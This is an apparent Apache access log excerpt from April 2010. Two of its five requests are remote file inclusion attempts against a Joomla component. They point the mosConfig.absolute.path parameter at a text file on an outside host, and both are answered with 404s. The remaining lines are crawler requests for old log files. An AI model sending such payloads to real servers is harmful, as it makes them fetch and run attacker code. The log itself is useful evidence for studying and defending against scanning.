81.176.226.170 - - [20/Apr/2010:00:12:10 -0500] "GET /logs///administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://www.nmnudegirls.com/asu/includes/f1.txt?? HTTP/1.1" 404 351 "-""Mozilla/5.0"
87.250.255.243 - - [20/Apr/2010:00:13:38 -0500] "GET /logs/access_log.1211932800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
81.176.226.170 - - [20/Apr/2010:00:18:07 -0500] "GET /logs/access_log.1268265600///administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://www.nmnudegirls.com/asu/includes/f1.txt?? HTTP/1.1" 404 373 "-""Mozilla/5.0"
87.250.255.243 - - [20/Apr/2010:00:19:04 -0500] "GET /logs/access_log.1214697600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
87.250.255.243 - - [20/Apr/2010:00:23:35 -0500] "GET /logs/access_log.1177718400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
